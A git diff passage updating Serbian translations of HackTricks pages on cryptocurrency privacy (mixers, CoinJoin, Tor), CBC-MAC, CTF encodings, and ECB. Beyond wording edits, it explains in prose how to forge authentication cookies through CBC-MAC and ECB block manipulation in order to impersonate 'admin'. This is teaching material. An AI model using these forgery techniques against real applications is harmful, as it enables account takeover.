ugrožavajući privatnost korisnika. Ovo je posebno tačno ako entitet operiše mnogo Bitcoin čvorova, poboljšavajući njihovu sposobnost praćenja transakcija. +Prateći mrežni saobraćaj, napadači mogu potencijalno povezati transakcije ili blokove sa IP adresama, ugrožavajući privatnost korisnika. Ovo je posebno tačno ako entitet upravlja mnogo Bitcoin čvorova, poboljšavajući njihovu sposobnost praćenja transakcija. ## Više Za sveobuhvatan spisak napada na privatnost i odbrane, posetite [Privatnost Bitkoina na Bitkoin Wiki](https://en.bitcoin.it/wiki/Privacy). -# Anonimne Transakcije Bitkoina +# Anonimne Bitkoin Transakcije ## Načini za Anonimno Dobijanje Bitkoina - **Gotovinske Transakcije**: Nabavljanje bitkoina putem gotovine. - **Alternativne Gotovinske Opcije**: Kupovina poklon kartica i razmena istih za bitkoin online. -- **Rudarenje**: Najprivatniji način za zaradu bitkoina je putem rudarenja, posebno kada se radi samostalno jer rudarski bazeni mogu znati IP adresu rudara. [Informacije o Rudarskim Bazama](https://en.bitcoin.it/wiki/Pooled_mining) +- **Rudarenje**: Najprivatniji način za zaradu bitkoina je putem rudarenja, posebno kada se radi samostalno jer rudarski bazeni mogu znati IP adresu rudara. [Informacije o Rudarskim Bazenima](https://en.bitcoin.it/wiki/Pooled_mining) - **Krađa**: Teorijski, krađa bitkoina mogla bi biti još jedan način za anonimno sticanje istih, iako je ilegalna i nije preporučljiva. ## Usluge Mešanja @@ -127,16 +128,16 @@ Korišćenjem usluge mešanja, korisnik može **poslati bitkoine** i dobiti **ra Primeri transakcija koje su možda koristile CoinJoin uključuju `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` i `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. -Za više informacija, posetite [CoinJoin](https://coinjoin.io/en). Za sličnu uslugu na Ethereumu, pogledajte [Tornado Cash](https://tornado.cash), koji anonimizira transakcije sa sredstvima od rudara. +Za više informacija, posetite [CoinJoin](https://coinjoin.io/en). Za sličnu uslugu na Ethereumu, pogledajte [Tornado Cash](https://tornado.cash), koja anonimizira transakcije sa sredstvima od rudara. ## PayJoin -Varijanta CoinJoin-a, **PayJoin** (ili P2EP), prikriva transakciju između dve strane (npr. kupca i trgovca) kao redovnu transakciju, bez karakterističnih jednakih izlaza karakterističnih za CoinJoin. Ovo ga čini izuzetno teškim za otkrivanje i može poništiti heuristiku zajedničkog vlasništva ulaza koju koriste entiteti za nadzor transakcija. +Varijanta CoinJoin-a, **PayJoin** (ili P2EP), prikriva transakciju između dve strane (npr. kupca i trgovca) kao redovnu transakciju, bez karakterističnih jednakih izlaza karakterističnih za CoinJoin. Ovo ga čini izuzetno teškim za otkrivanje i moglo bi poništiti heuristiku zajedničkog vlasništva ulaza koju koriste entiteti za nadzor transakcija. ```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` -Transakcije poput one gore navedene mogle bi biti PayJoin, poboljšavajući privatnost dok ostaju neodvojive od standardnih bitkoin transakcija. +Transakcije poput one iznad mogu biti PayJoin, poboljšavajući privatnost dok ostaju neodvojive od standardnih bitkoin transakcija. **Korišćenje PayJoin-a može značajno poremetiti tradicionalne metode nadzora**, čineći ga obećavajućim razvojem u potrazi za transakcionom privatnošću. @@ -145,22 +146,22 @@ Transakcije poput one gore navedene mogle bi biti PayJoin, poboljšavajući priv ## **Tehnike sinhronizacije novčanika** -Za održavanje privatnosti i sigurnosti, sinhronizacija novčanika sa blokčejnom je ključna. Ističu se dve metode: +Za održavanje privatnosti i sigurnosti, sinhronizacija novčanika sa blokčejnom je ključna. Ističu se dva metoda: -- **Puni čvor**: Preuzimanjem celog blokčejna, puni čvor obezbeđuje maksimalnu privatnost. Sve ikada napravljene transakcije čuvaju se lokalno, čineći nemogućim da protivnici identifikuju koje transakcije ili adrese korisnik zanima. -- **Filtriranje blokova na strani klijenta**: Ova metoda podrazumeva kreiranje filtera za svaki blok u blokčejnu, omogućavajući novčanicima da identifikuju relevantne transakcije bez otkrivanja specifičnih interesa posmatračima mreže. Lagani novčanici preuzimaju ove filtere, samo preuzimajući kompletne blokove kada se pronađe podudaranje sa adresama korisnika. +- **Puni čvor**: Preuzimanjem celog blokčejna, puni čvor obezbeđuje maksimalnu privatnost. Sve transakcije ikada napravljene se čuvaju lokalno, čineći nemogućim da protivnici identifikuju koje transakcije ili adrese korisniku interesuju. +- **Filtriranje blokova na strani klijenta**: Ovaj metod uključuje kreiranje filtera za svaki blok u blokčejnu, omogućavajući novčanicima da identifikuju relevantne transakcije bez otkrivanja specifičnih interesa mrežnim posmatračima. Lagani novčanici preuzimaju ove filtere, samo preuzimajući pune blokove kada se pronađe podudaranje sa adresama korisnika. ## **Korišćenje Tora za anonimnost** -S obzirom da Bitkoin funkcioniše na peer-to-peer mreži, preporučuje se korišćenje Tora kako bi se sakrila vaša IP adresa, poboljšavajući privatnost prilikom interakcije sa mrežom. +S obzirom da Bitcoin funkcioniše na peer-to-peer mreži, preporučuje se korišćenje Tora kako bi se sakrila vaša IP adresa, poboljšavajući privatnost prilikom interakcije sa mrežom. ## **Prevencija ponovne upotrebe adresa** -Radi zaštite privatnosti, važno je koristiti novu adresu za svaku transakciju. Ponovna upotreba adresa može ugroziti privatnost povezivanjem transakcija sa istim entitetom. Savremeni novčanici odvraćaju od ponovne upotrebe adresa svojim dizajnom. +Da bi se sačuvala privatnost, važno je koristiti novu adresu za svaku transakciju. Ponovna upotreba adresa može ugroziti privatnost povezivanjem transakcija sa istim entitetom. Savremeni novčanici odvraćaju od ponovne upotrebe adresa svojim dizajnom. ## **Strategije za privatnost transakcija** -- **Višestruke transakcije**: Podela plaćanja na nekoliko transakcija može zamagliti iznos transakcije, ometajući napade na privatnost. +- **Višestruke transakcije**: Deljenje plaćanja na nekoliko transakcija može zamagliti iznos transakcije, ometajući napade na privatnost. - **Izbegavanje kusura**: Odabir transakcija koje ne zahtevaju izlaz za kusur poboljšava privatnost ometanjem metoda detekcije kusura. - **Višestruki izlazi za kusur**: Ako izbegavanje kusura nije izvodljivo, generisanje više izlaza za kusur i dalje može poboljšati privatnost. @@ -172,13 +173,13 @@ Monero adresira potrebu za apsolutnom anonimnošću u digitalnim transakcijama, ## **Razumevanje Gasa** -Gas meri računarski napor potreban za izvršavanje operacija na Ethereumu, cenjen u **gwei**-ima. Na primer, transakcija koja košta 2.310.000 gwei (ili 0,00231 ETH) uključuje limit gasa, osnovnu naknadu i napojnicu za podsticanje rudara. Korisnici mogu postaviti maksimalnu naknadu kako bi se osigurali da ne preplate, pri čemu im se višak vraća. +Gas meri računarski napor potreban za izvršavanje operacija na Ethereumu, cenjen u **gwei**-ima. Na primer, transakcija koja košta 2.310.000 gwei (ili 0,00231 ETH) uključuje limit gasa, osnovnu naknadu i napojnicu za podsticanje rudara. Korisnici mogu postaviti maksimalnu naknadu kako bi se osigurali da ne preplate, sa vraćanjem viška. ## **Izvršavanje transakcija** -Transakcije na Ethereumu uključuju pošiljaoca i primaoca, koji mogu biti adrese korisnika ili pametnih ugovora. Zahtevaju naknadu i moraju biti rudarene. Bitne informacije u transakciji uključuju primaoca, potpis pošiljaoca, vrednost, opcioni podaci, limit gasa i naknade. Važno je napomenuti da se adresa pošiljaoca dedukuje iz potpisa, eliminišući potrebu za njom u podacima transakcije. +Transakcije na Ethereumu uključuju pošiljaoca i primaoca, koji mogu biti ili korisničke adrese ili adrese pametnih ugovora. Zahtevaju naknadu i moraju biti rudarene. Bitne informacije u transakciji uključuju primaoca, potpis pošiljaoca, vrednost, opcioni podaci, limit gasa i naknade. Važno je napomenuti da se adresa pošiljaoca dedukuje iz potpisa, eliminišući potrebu za njom u podacima transakcije. -Ove prakse i mehanizmi su osnovni za svakoga ko želi da se bavi kriptovalutama uz prioritet privatnosti i sigurnosti. +Ove prakse i mehanizmi su osnovni za svakoga ko želi da se bavi kriptovalutama uz prioritizaciju privatnosti i sigurnosti. ## Reference diff --git a/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md b/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md index b1285372a..2d392b13c 100644 --- a/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md +++ b/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md @@ -1,39 +1,40 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} # CBC -Ako je **kolačić** **samo** **korisničko ime** (ili je prvi deo kolačića korisničko ime) i želite da se predstavite kao korisnik "**admin**". Tada možete kreirati korisničko ime **"bdmin"** i **bruteforce**-ovati **prvi bajt** kolačića. +Ako je **kolačić** **samo** **korisničko ime** (ili je prvi deo kolačića korisničko ime) i želite da se predstavite kao korisnik "**admin**". Tada možete kreirati korisničko ime **"bdmin"** i **bruteforce** prvi bajt kolačića. # CBC-MAC -**Cipher block chaining message authentication code** (**CBC-MAC**) je metoda korišćena u kriptografiji. Radi tako što uzima poruku i šifruje je blok po blok, gde je šifrovanje svakog bloka povezano sa prethodnim. Ovaj proces stvara **lanac blokova**, osiguravajući da čak i promena jednog bita originalne poruke dovede do nepredvidive promene poslednjeg bloka šifrovanih podataka. Da bi se napravila ili poništila takva promena, potreban je ključ za šifrovanje, osiguravajući sigurnost. +**Šifrovano vezivanje poruka za autentifikaciju blokova** (**CBC-MAC**) je metoda korišćena u kriptografiji. Radi tako što uzima poruku i šifruje je blok po blok, gde je šifrovanje svakog bloka povezano sa prethodnim. Ovaj proces stvara **lanac blokova**, osiguravajući da čak i promena jednog bita originalne poruke dovede do nepredvidive promene poslednjeg bloka šifrovanih podataka. Da bi se napravila ili poništila takva promena, potreban je ključ za šifrovanje, obezbeđujući sigurnost. -Za izračunavanje CBC-MAC poruke m, enkriptuje se m u CBC režimu sa nulom kao inicijalizacijom vektora i čuva se poslednji blok. Sledeća slika prikazuje računanje CBC-MAC poruke koja se sastoji od blokova ![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) koristeći tajni ključ k i blok šifre E: +Da bi se izračunao CBC-MAC poruke m, poruka se šifruje u CBC režimu sa nulom kao inicijalizacioni vektor i čuva se poslednji blok. Sledeća slika prikazuje računanje CBC-MAC poruke koja se sastoji od blokova ![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) koristeći tajni ključ k i blok šifre E: ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) # Ranjivost Sa CBC-MAC obično se koristi **IV 0**.\ -Ovo je problem jer 2 poznate poruke (`m1` i `m2`) nezavisno će generisati 2 potpisa (`s1` i `s2`). Dakle: +To je problem jer će 2 poznate poruke (`m1` i `m2`) nezavisno generisati 2 potpisa (`s1` i `s2`). Dakle: * `E(m1 XOR 0) = s1` * `E(m2 XOR 0) = s2` -Zatim poruka sastavljena od m1 i m2 konkateniranih (m3) će generisati 2 potpisa (s31 i s32): +Zatim će poruka sastavljena od m1 i m2 konkateniranih (m3) generisati 2 potpisa (s31 i s32): * `E(m1 XOR 0) = s31 = s1` * `E(m2 XOR s1) = s32` @@ -46,7 +47,7 @@ Zamislite da šifrujete ime **Administrator** u blokovima od **8 bajtova**: * `rator\00\00\00` Možete kreirati korisničko ime nazvano **Administ** (m1) i dobiti potpis (s1).\ -Zatim, možete kreirati korisničko ime nazvano rezultat `rator\00\00\00 XOR s1`. Ovo će generisati `E(m2 XOR s1 XOR 0)` što je s32.\ +Zatim možete kreirati korisničko ime nazvano rezultat `rator\00\00\00 XOR s1`. Ovo će generisati `E(m2 XOR s1 XOR 0)` što je s32.\ sada, možete koristiti s32 kao potpis punog imena **Administrator**. ### Rezime @@ -66,16 +67,17 @@ Sada, ako možete kontrolisati IV, možete promeniti prvi bajt IV-a tako da **IV Više informacija na [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/crypto-and-stego/crypto-ctfs-tricks.md b/crypto-and-stego/crypto-ctfs-tricks.md index 0c9df1d52..001ed6f30 100644 --- a/crypto-and-stego/crypto-ctfs-tricks.md +++ b/crypto-and-stego/crypto-ctfs-tricks.md @@ -1,18 +1,19 @@ # Trikovi za Crypto CTF-ove +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite trikove hakovanja slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ## Online baze heševa @@ -37,7 +38,7 @@ Drugi načini podrške HackTricks-u: ## Enkoderi -Većina enkodiranih podataka može se dekodirati sa ovim 2 resursa: +Većinu enkodiranih podataka možete dekodirati sa ovim 2 resursa: * [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) * [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) @@ -58,6 +59,7 @@ Većina enkodiranih podataka može se dekodirati sa ovim 2 resursa: ### Automatski rešavači za osnovne enkodiranja Proverite sve ove baze sa: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) +* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] * `DmPsv8J7qrlKEoY7` * **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] * `kLD8iwKsigSalLJ5` @@ -138,7 +140,7 @@ ryvkryvkryvkryvkryvkryvkryvk ``` drnajapajrna ``` -* [https://www.geocachingtoolbox.com/index.php?lang=sr\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=sr\&page=dvorakKeyboard) +* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard) ### A1Z26 @@ -146,7 +148,7 @@ Slova njihova numerička vrednost ``` 8 15 12 1 3 1 18 1 3 15 12 1 ``` -### Afina Šifra Kodiranje +### Afinski šifarski kod Pretvori slovo u broj `(ax+b)%26` (_a_ i _b_ su ključevi, a _x_ je slovo) i rezultat ponovo u slovo ``` @@ -154,15 +156,15 @@ krodfdudfrod ``` ### SMS Kod -**Multitap** [zamenjuje slovo](https://www.dcode.fr/word-letter-change) ponovljenim brojevima definisanim odgovarajućim kodom tastera na mobilnom [telefonskom tastaturi](https://www.dcode.fr/phone-keypad-cipher) (Ovaj režim se koristi prilikom pisanja SMS poruka).\ +**Multitap** [zamenjuje slovo](https://www.dcode.fr/word-letter-change) ponovljenim brojevima definisanim odgovarajućim kodom tastera na mobilnoj [telefonskoj tastaturi](https://www.dcode.fr/phone-keypad-cipher) (Ovaj režim se koristi prilikom pisanja SMS poruka).\ Na primer: 2=A, 22=B, 222=C, 3=D...\ -Možete prepoznati ovaj kod jer ćete videti\*\* više puta ponovljene brojeve\*\*. +Možete identifikovati ovaj kod jer ćete videti\*\* više puta ponovljene brojeve\*\*. Ovaj kod možete dekodirati na: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) ### Bacon Kod -Zamenite svako slovo sa 4 A-ja ili B-a (ili 1 i 0) +Zamenite svako slovo sa 4 A ili B (ili 1 i 0) ``` 00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000 AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA @@ -213,7 +215,7 @@ Key: ### Samir Deljenje tajni -Tajna je podeljena na X delova i da biste je vratili, potrebno vam je Y delova (_Y <=X_). +Tajna je podeljena na X delova i za njeno vraćanje potrebno je Y delova (_Y <=X_). ``` 8019f8fa5879aa3e07858d08308dc1a8b45 80223035713295bddf0b0bd1b10a5340b89 @@ -232,16 +234,17 @@ Tajna je podeljena na X delova i da biste je vratili, potrebno vam je Y delova ( * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/crypto-and-stego/electronic-code-book-ecb.md b/crypto-and-stego/electronic-code-book-ecb.md index b4d6142e5..9222cc365 100644 --- a/crypto-and-stego/electronic-code-book-ecb.md +++ b/crypto-and-stego/electronic-code-book-ecb.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJEM**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} # ECB -(ECB) Electronic Code Book - simetrična šema šifrovanja koja **zamenjuje svaki blok čistog teksta** sa **blokom šifrovanog teksta**. To je **najjednostavnija** šema šifrovanja. Osnovna ideja je da se **podeli** čisti tekst u **blokove od N bitova** (zavisi od veličine bloka ulaznih podataka, algoritma šifrovanja) i zatim da se šifruje (dešifruje) svaki blok čistog teksta koristeći samo ključ. +(ECB) Elektronski kodni blok - simetrična šema šifrovanja koja **zamenjuje svaki blok čistog teksta** blokom šifrovanog teksta. To je **najjednostavnija** šema šifrovanja. Osnovna ideja je da se čisti tekst **podeli** na **blokove od N bitova** (zavisi od veličine bloka ulaznih podataka, algoritma šifrovanja) i zatim da se šifruje (dešifruje) svaki blok čistog teksta koristeći jedini ključ. ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) @@ -26,9 +27,9 @@ Korišćenje ECB ima višestruke sigurnosne implikacije: # Otkrivanje ranjivosti -Zamislite da se prijavljujete na aplikaciju nekoliko puta i uvek dobijate **isti kolačić**. To je zato što je kolačić aplikacije **`|`**.\ +Zamislite da se prijavljujete na aplikaciju nekoliko puta i **uvek dobijate isti kolačić**. To je zato što je kolačić aplikacije **`|`**.\ Zatim, generišete dva nova korisnika, oba sa **istom dugom lozinkom** i **skoro** **istim** **korisničkim imenom**.\ -Otkrijete da su **blokovi od 8B** gde je **informacija oba korisnika** ista **jednaki**. Tada, pretpostavljate da se to možda dešava jer se koristi **ECB**. +Otkrijete da su **blokovi od 8B** gde je **informacija oba korisnika** ista **jednaki**. Tada pretpostavljate da se to možda dešava jer se koristi **ECB**. Kao u sledećem primeru. Posmatrajte kako ova **2 dekodirana kolačića** imaju nekoliko puta blok **`\x23U\xE45K\xCB\x21\xC8`** ``` @@ -41,12 +42,12 @@ Ovo je zato što su **korisničko ime i lozinka tih kolačića sadržali više p Sada napadač samo treba da otkrije da li je format `` ili ``. Da bi to uradio, može jednostavno **generisati nekoliko korisničkih imena** sa **sličnim i dugim korisničkim imenima i lozinkama dok ne otkrije format i dužinu razdelnika:** | Dužina korisničkog imena: | Dužina lozinke: | Dužina korisničkog imena+Lozinke: | Dužina kolačića (nakon dekodiranja): | -| -------------------------- | ---------------- | ---------------------------------- | -------------------------------------- | -| 2 | 2 | 4 | 8 | -| 3 | 3 | 6 | 8 | -| 3 | 4 | 7 | 8 | -| 4 | 4 | 8 | 16 | -| 7 | 7 | 14 | 16 | +| ------------------------- | ---------------- | ---------------------------------- | -------------------------------------- | +| 2 | 2 | 4 | 8 | +| 3 | 3 | 6 | 8 | +| 3 | 4 | 7 | 8 | +| 4 | 4 | 8 | 16 | +| 7 | 7 | 14 | 16 | # Iskorišćavanje ranjivosti @@ -56,7 +57,7 @@ Znajući format kolačića (`|`), kako bi se predstavi ``` \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` -Možemo videti obrazac `\x23U\xE45K\xCB\x21\xC8` koji je prethodno kreiran sa korisničkim imenom koje sadrži samo `a`.\ +Možemo videti obrazac `\x23U\xE45K\xCB\x21\xC8` kreiran ranije sa korisničkim imenom koje je sadržalo samo `a`.\ Zatim, možete ukloniti prvi blok od 8B i dobićete validan kolačić za korisničko ime `admin`: ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 @@ -67,10 +68,10 @@ U mnogim bazama podataka isto je tražiti `WHERE username='admin';` ili `WHERE u Dakle, još jedan način da se predstavite kao korisnik `admin` bio bi: -* Generišite korisničko ime koje: `len() + len(` će generisati 2 bloka od 8B. +* Generišite korisničko ime koje: `len() + len(` će generisati 2 bloka od 8B. * Zatim, generišite lozinku koja će popuniti tačan broj blokova koji sadrže korisničko ime koje želimo da predstavimo i razmake, kao što je: `admin ` -Kolačić ovog korisnika će biti sastavljen od 3 bloka: prva 2 su blokovi korisničkog imena + delimitera, a treći je lozinka (koja predstavlja korisničko ime): `username |admin ` +Kolačić ovog korisnika će biti sastavljen od 3 bloka: prva 2 bloka su blokovi korisničkog imena + delimitera, a treći je lozinka (koja predstavlja korisničko ime): `username |admin ` **Zatim, jednostavno 